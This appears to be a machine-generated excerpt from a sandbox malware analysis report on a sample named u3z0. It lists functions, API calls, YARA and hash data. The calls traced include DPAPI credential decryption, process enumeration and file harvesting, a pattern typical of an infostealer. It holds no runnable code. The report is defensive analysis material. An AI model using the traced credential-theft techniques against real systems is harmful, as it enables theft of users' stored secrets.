                                                                                                                                                                                                                                                                                          • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                                                                          • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                                                                          • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                                                                          • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                                                                                        • memcmp.MSVCRT ref: 00409774
                                                                                                                                                                                                                                                                                          • Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                                                                                          • Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                                                                                          • Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                                                                        • String ID: $DPAPI
                                                                                                                                                                                                                                                                                        • API String ID: 2647593125-1819349886
                                                                                                                                                                                                                                                                                        • Opcode ID: 20fedc1595b1d14bfbc67299ff3f27808ad2d0836df1b2d3d14e3d80815450fd
                                                                                                                                                                                                                                                                                        • Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20fedc1595b1d14bfbc67299ff3f27808ad2d0836df1b2d3d14e3d80815450fd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00414DE0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3491751439-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 663210355256c1a79006bc930096bf3c730480ad8148fdf9ee136a6da0e86fe2
                                                                                                                                                                                                                                                                                        • Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 663210355256c1a79006bc930096bf3c730480ad8148fdf9ee136a6da0e86fe2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004159E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
                                                                                                                                                                                                                                                                                        • GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 00415A27
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1378416451-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                                                                        • Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004137B3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,04402B50,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,?,04402B50,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 941982115-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                                                                                                                                                        • Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00406730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: Pi@
                                                                                                                                                                                                                                                                                        • API String ID: 0-1360946908
                                                                                                                                                                                                                                                                                        • Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                                                                                                                                                                                                        • Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00404470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CrackInternetlstrlenmalloc
                                                                                                                                                                                                                                                                                        • String ID: <
                                                                                                                                                                                                                                                                                        • API String ID: 3848002758-4251816714
                                                                                                                                                                                                                                                                                        • Opcode ID: 85c67f99e022b53bf17435a6d7f42a962d884bf02f2d202c56b95b99adfd8f66
                                                                                                                                                                                                                                                                                        • Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85c67f99e022b53bf17435a6d7f42a962d884bf02f2d202c56b95b99adfd8f66
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040EF80 Relevance: 4.7, APIs: 3, Instructions: 197COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,044038F0), ref: 0040EFCE
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,04403650), ref: 0040F06F
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,04403570), ref: 0040F17E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3722407311-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3a96b665b3cbcbf55da3d0258d3f7f573c41df7ba93c0507f9044406bed029a1
                                                                                                                                                                                                                                                                                        • Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a96b665b3cbcbf55da3d0258d3f7f573c41df7ba93c0507f9044406bed029a1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040EF9F Relevance: 4.7, APIs: 3, Instructions: 177COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,044038F0), ref: 0040EFCE
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,04403650), ref: 0040F06F
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,04403570), ref: 0040F17E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3722407311-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 31357a372ffa8051568a26c3519af1ef57e737c077d660d25448396aefe02b83
                                                                                                                                                                                                                                                                                        • Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 31357a372ffa8051568a26c3519af1ef57e737c077d660d25448396aefe02b83
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004127E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0041281A
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406A98), ref: 00412838
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: FindFirstFileA.KERNELBASE(?,?), ref: 004125A0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: lstrcat.KERNEL32(?,044036B0), ref: 0041269B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                                        • String ID: 00A
                                                                                                                                                                                                                                                                                        • API String ID: 2104210347-95910775
                                                                                                                                                                                                                                                                                        • Opcode ID: 0059c6a1cdbce71a941e6102a03021f307d23a853d510470ca8830f04c47ea2b
                                                                                                                                                                                                                                                                                        • Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0059c6a1cdbce71a941e6102a03021f307d23a853d510470ca8830f04c47ea2b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C743060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C743095
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7435A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C7CF688,00001000), ref: 6C7435D5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7435A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7435E0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7435A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C7435FD
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7435A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C74363F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7435A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C74369F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7435A0: __aulldiv.LIBCMT ref: 6C7436E4
                                                                                                                                                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C74309F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C7656EE,?,00000001), ref: 6C765B85
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765B50: EnterCriticalSection.KERNEL32(6C7CF688,?,?,?,6C7656EE,?,00000001), ref: 6C765B90
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765B50: LeaveCriticalSection.KERNEL32(6C7CF688,?,?,?,6C7656EE,?,00000001), ref: 6C765BD8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765B50: GetTickCount64.KERNEL32 ref: 6C765BE4
                                                                                                                                                                                                                                                                                        • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C7430BE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7430F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C743127
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7430F0: __aulldiv.LIBCMT ref: 6C743140
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77AB2A: __onexit.LIBCMT ref: 6C77AB30
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
